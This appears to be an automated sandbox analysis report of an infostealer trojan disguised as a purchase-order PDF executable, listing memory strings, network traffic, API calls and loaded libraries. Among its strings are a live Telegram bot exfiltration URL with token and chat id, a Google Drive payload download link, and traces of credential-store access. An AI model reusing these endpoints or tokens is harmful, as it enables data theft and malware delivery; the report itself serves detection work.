            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056C2000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2945989990.0000000034D90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=download
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1Juh7AeT-lysRqJEoEbbuZIeXvcWeNVKy&export=downloadT
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/t
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
            Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
            Source: unknownHTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe
            Source: initial sampleStatic PE information: Filename: PURCHASE ORDER TRC-0909718-24_pdf.exe
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeStatic file information: Suspicious name
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_004070414_2_00407041
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_0040686A4_2_0040686A
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00404B304_2_00404B30
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_001543284_2_00154328
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00158DA04_2_00158DA0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_001559684_2_00155968
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_00155F904_2_00155F90
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: String function: 00402BBF appears 51 times
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946427249.0000000035AE7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PURCHASE ORDER TRC-0909718-24_pdf.exe
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@6/5
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_004045B4 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045B4
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetensJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nshE91D.tmpJump to behavior
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DC5000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DB5000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DD3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeVirustotal: Detection: 47%
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile read: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"Jump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: PURCHASE ORDER TRC-0909718-24_pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2006375263.0000000005405000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2918352521.0000000003F75000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeCode function: 4_3_001949CC push eax; iretd 4_3_001949CD
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
